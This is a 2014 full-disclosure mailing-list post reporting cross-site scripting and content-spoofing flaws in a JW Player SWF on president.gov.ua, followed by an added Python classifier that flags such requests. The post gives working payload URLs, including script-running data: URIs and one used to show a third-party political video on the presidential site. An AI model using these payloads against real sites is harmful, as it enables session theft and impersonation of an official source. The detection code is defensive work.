Date: Sun, 19 Jan 2014 21:20:35 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Multiple vulnerabilities at president.gov.ua

Hello, participants of the mailing list.

For those who didn't read my posts on social networks last night and at my
web site, here is information about multiple vulnerabilities at
president.gov.ua. There are Cross-Site Scripting and Cross-Site Request
Forgery vulnerabilities.

In January 2007 I made a "presidents fiesta": I published multiple
vulnerabilities at the web sites of the presidents of Ukraine, Russia, the USA,
Byelorussia and Slovakia. And here are new holes at the web site of the new
president of Ukraine.

Cross-Site Scripting (WASC-08):

http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://president.gov.ua/js/jw/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Content Spoofing (WASC-12):

http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true

http://president.gov.ua/js/jw/player.swf?config=http://site/1.xml

http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua

Here is a nice example of using one of these holes. The video is "published"
at the president's web site, in which Victor Yanukovich tells about his
corruption and criminal actions (in the Ukrainian language).

http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true

P.S.

Photos and videos of the current protest events in Kyiv, Ukraine can be seen on
Twitter (including online video translation in my Twitter account).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
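
All of the URLs above abuse the same pattern: the legacy JW Player SWF accepts URL-valued query parameters (`aboutlink`, `link`, `file`, `config`) and either navigates to them or loads content from them, so a `data:`/`javascript:` value runs script in the site's origin and an off-site value lets a third party choose what the player shows. The following classifier, an added example that is not part of the original post, flags such requests in a web-server access log or WAF rule; the parameter set and the trusted-host list are assumptions for this demonstration.

```python
from urllib.parse import urlsplit, parse_qs

# Query parameters of the legacy JW Player SWF that take a URL or a navigation
# target (assumed set; these are the ones exercised in the post above).
URL_PARAMS = {"aboutlink", "link", "file", "config"}
# Schemes that execute in the embedding page's origin when navigated to.
SCRIPT_SCHEMES = ("data:", "javascript:", "vbscript:")


def classify_player_url(url, trusted_hosts):
    """Return [(param, finding), ...] for one player.swf request URL.

    'script-scheme'     : value would run script in the site's origin (XSS).
    'external-resource' : value points off-site, so a third party controls
                          the media, config or link target (content spoofing).
    An empty list means no risky parameter was seen.
    """
    parts = urlsplit(url)
    findings = []
    if not parts.path.lower().endswith("player.swf"):
        return findings
    # parse_qs percent-decodes values, so %2B etc. are already resolved here.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() not in URL_PARAMS:
            continue
        for raw in values:
            value = raw.strip().lower()           # defeats " data:" / "DATA:"
            if value.startswith(SCRIPT_SCHEMES):
                findings.append((name, "script-scheme"))
                continue
            host = urlsplit(value).hostname       # also catches //host/... forms
            if host and host not in trusted_hosts:
                findings.append((name, "external-resource"))
    return findings


# Constructed sample: the URLs reported in the post plus two benign requests.
TRUSTED = {"president.gov.ua"}
SAMPLE_URLS = [
    "http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B",
    "http://president.gov.ua/js/jw/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg",
    "http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true",
    "http://president.gov.ua/js/jw/player.swf?config=http://site/1.xml",
    "http://president.gov.ua/js/jw/player.swf?file=/video/1.flv",
    "http://president.gov.ua/js/jw/player.swf?file=http://president.gov.ua/video/1.flv",
]


def audit(urls=SAMPLE_URLS, trusted=TRUSTED):
    """Map each URL to its findings; only flagged URLs are included."""
    return {u: f for u in urls if (f := classify_player_url(u, trusted))}


if __name__ == "__main__":
    for url, found in audit().items():
        print(found, url)
```

Each `script-scheme` hit corresponds to the XSS entries in the post and each `external-resource` hit to the content-spoofing entries; the two benign URLs produce no findings.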

